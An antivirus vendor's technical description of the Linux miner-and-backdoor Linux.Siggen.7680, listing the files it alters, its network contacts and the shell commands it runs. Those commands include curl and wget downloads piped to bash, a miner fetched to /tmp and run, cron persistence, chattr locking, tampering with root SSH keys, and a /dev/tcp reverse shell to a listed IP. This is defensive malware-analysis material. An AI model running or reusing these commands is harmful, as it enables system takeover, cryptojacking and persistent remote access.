Linux.Siggen.7680
Added to the Dr.Web virus database: 2024-06-25
Virus description added: 2024-06-24
Technical Information
To ensure autorun and distribution:
Creates or modifies the following files:
/etc/cron.d/watch
/etc/cron.hourly/prelink
Malicious functions:
Launches itself as a daemon
Gets access to SSH keys
/root/.ssh/authorized_keys2
/root/.ssh/authorized_keys
Performs process tracing:
Launches processes:
rm -f /etc/hosts.old
curl -fs http://w.softprojectcode.com/miner -o /tmp/.miner && chmod 755 /tmp/.miner && /tmp/.miner
chattr -ia /etc/crontab > /dev/null 2>&1
chattr -ia -R /var/spool/cron/crontabs
chattr -ia -R /root/.ssh
chattr +i /etc/cron.hourly/prelink
chattr -ia -R /var/spool/cron/crontabs > /dev/null 2>&1
curl -fs http://w.softprojectcode.com/miner -o /tmp/.miner
chmod 755 /etc/cron.hourly/prelink
rm -rf /root/.ssh/authorized_keys2
echo \x27#!/bin/bash\x27 > /etc/cron.hourly/prelink
chattr +i /etc/cron.hourly/prelink > /dev/null 2>&1
chmod 755 /tmp/.miner
/tmp/.miner
chattr +i /etc/cron.d/watch > /dev/null 2>&1
echo \x270 2 * * * root wget -c http://z.shavsl.com/b -qO -|bash \x27 >> /etc/cron.d/watch
rm -rf /root/.ssh/authorized_keys
chattr -ia /etc/crontab
echo \x270 1 * * * root curl -fs http://z.shavsl.com/b|bash \x27 > /etc/cron.d/watch
chattr -ia -R /etc/cron.d
chattr +i /root/.ssh/authorized_keys2
chattr -ia -R /etc/cron.d > /dev/null 2>&1
chattr -ia -R /var/spool/cron
chattr +i /etc/cron.d/watch
chattr -ia -R /etc/cron.hourly
chattr -ia -R /etc/cron.hourly > /dev/null 2>&1
chattr +i /root/.ssh/authorized_keys
echo \x27bash -i >& /dev/tcp/198.144.156.34/8443 0>&1\x27 >> /etc/cron.hourly/prelink
chattr -ia -R /var/spool/cron > /dev/null 2>&1
Performs operations with the file system:
Modifies file access rights:
/etc/cron.hourly/prelink
/tmp/.miner
Creates folders:
Creates or modifies files:
Deletes files:
/root/.ssh/authorized_keys2
/etc/hosts.old
Network activity:
Establishes connection:
8.#.8.8:53
66.###.228.52:80
45.###.200.163:3334
45.###.200.163:6666
127.0.0.1:3334
127.0.0.1:6666
45.###.200.163:3333
127.0.0.1:3333
84.##.44.239:53126
17#.##.81.161:53126
45.###.200.163:53126
127.0.0.1:53126
DNS ASK:
w.#####rojectcode.com
o.######ldinformation.com
o.#####rojectcode.com
rt#.####goldinformation.com
rt#.###tprojectcode.com
Sends data to the following servers:
Receives data from the following servers:
Other:
Collects CPU information
Collects RAM information
Curing recommendations
Linux